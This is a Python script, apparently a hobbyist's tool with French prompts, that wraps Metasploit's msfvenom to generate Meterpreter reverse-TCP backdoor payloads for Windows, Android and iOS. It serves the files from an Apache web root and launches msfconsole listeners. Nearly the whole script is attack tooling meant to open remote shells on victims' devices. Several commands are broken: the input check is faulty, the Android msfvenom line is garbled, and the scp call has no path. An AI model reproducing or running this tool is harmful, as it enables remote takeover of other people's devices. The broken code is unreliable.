#importer une bibliotheque

import os
import time

#présentation
os.system("clear")
print("rapide est simple générateur de payload metasploit ( msfconsole )\n\n")
print(" _______  _______  _______ _________ _______  _______  _        _______ __________________    ")
print("(  ____ \(  ___  )(  ____ \\__   __/(  ____ \(  ____ )( \      (  ___  )\__   __/\__   __/    ")
print("| (    \/| (   ) || (    \/   ) (   | (    \/| (    )|| (      | (   ) |   ) (      ) (       ")
print("| (__    | (___) || (_____    | |   | (_____ | (____)|| |      | |   | |   ) (      ) (       ")
print("|  __)   |  ___  |(_____  )   | |   (_____  )|  _____)| |      | |   | |   | |      | |       ")
print("| (      | (   ) |      ) |   | |         ) || (      | |      | |   | |   | |      | |       ")
print("| )      | )   ( |/\____) |   | |   /\____) || )      | (____/\| (___) |___) (___   | |       ")
print("|/       |/     \|\_______)   )_(   \_______)|/       (_______/(_______)\_______/   )_(   \n\n")
print("$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$")
print("$                                             $")
print("$    TikTok : charlie_bernard_au_fbi          $")
print("$    Instagram : Lefrentoune                  $")
print("$    Github : actonetor                       $")
print("$                                             $")
print("$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$\n")
sys = input("Entrer la base de donné pour votre payload ( android/windows/ios ) : ")
if not sys == str("windows") and ("android") and ("ios") and ("") :
    print("ERREUR: Entrer une options valide")
    quit()
if sys == str("windows"):
    os.system("clear")
    print("chargement  |")
    time.sleep(1)
    os.system("clear")
    print("chargement  \ ")
    time.sleep(1)
    os.system("clear")
    print("chargement  --")
    time.sleep(1)
    os.system("clear")
    print("chargement  /")
    time.sleep(1)
    os.system("clear")
    print("chargement  |")
    time.sleep(1)
    os.system("clear")
    print("chargement  \ ")
    time.sleep(1)
    os.system("clear")
    print("chargement  --")
    time.sleep(1)
    os.system("clear")
    print("chargement  /")
    time.sleep(1)
    os.system("ifconfig\n")
    ip = input("Entrer votre adresse ip ( LHOST ) : ")
    por = input("Entrer le port pour le payload ( LPORT ) : ")
    nom = input("Entrer le nom ( EX: winndowsbackdoor ) : ")
    os.system("clear")
    os.system("msfvenom -p windows/meterpreter/reverse_tcp LHOST=" + ip + " LPORT=" + por + " -f exe -o " + nom + ".exe")
    os.system("clear")
    os.system("mv " + nom + " /var/www/html")
    os.system("service apache2 start")
    os.system("msfconsole")
if sys == str("android"):
    os.system("clear")
    print("chargement  |")
    time.sleep(1)
    os.system("clear")
    print("chargement  \ ")
    time.sleep(1)
    os.system("clear")
    print("chargement  --")
    time.sleep(1)
    os.system("clear")
    print("chargement  /")
    time.sleep(1)
    os.system("clear")
    print("chargement  |")
    time.sleep(1)
    os.system("clear")
    print("chargement  \ ")
    time.sleep(1)
    os.system("clear")
    print("chargement  --")
    time.sleep(1)
    os.system("clear")
    print("chargement  /")
    time.sleep(1)
    os.system("ifconfig")
    ip = input("Entrer votre adresse ip ( LHOST ) : ")
    por = input("Entrer le port pour le payload ( LPORT ) : ")
    nom = input("Entrer le nom ( EX: windowsbackdoor ) : ")
    os.system("clear")
    os.system("msfvenom -p android/meterpreter/reverse_tcp LHOST=" + ip + " LPORT=" + por + "R =) /var/www/html/" + nom + ".exe")
    os.system("clear")
    os.system("service apache2 start")
    os.system("msfconsole")
if sys == str("ios"):
    os.system("clear")
    print("chargement  |")
    time.sleep(1)
    os.system("clear")
    print("chargement  \ ")
    time.sleep(1)
    os.system("clear")
    print("chargement  --")
    time.sleep(1)
    os.system("clear")
    print("chargement  /")
    time.sleep(1)
    os.system("clear")
    print("chargement  |")
    time.sleep(1)
    os.system("clear")
    print("chargement  \ ")
    time.sleep(1)
    os.system("clear")
    print("chargement  --")
    time.sleep(1)
    os.system("clear")
    print("chargement  /")
    time.sleep(1)
    os.system("ifconfig")
    ip = input("Entrer votre adresse ip ( LHOST ) : ")
    por = input("Entrer le port pour le payload ( LPORT ) : ")
    os.system("clear")
    os.system("msfvenom -p osx/armle/shell_reverse_tcp LHOST=" + ip + " LPORT=" + por + " -o src/var/mobile/Library/payme -f macho -a armle --platform osx")
    os.system("clear")
    os.system("dpkg-deb -Z gzip -b src/")
    os.system("scp src.deb root@" + ip)
    os.system("clear")
    os.system("msfconsole -r config.rc")
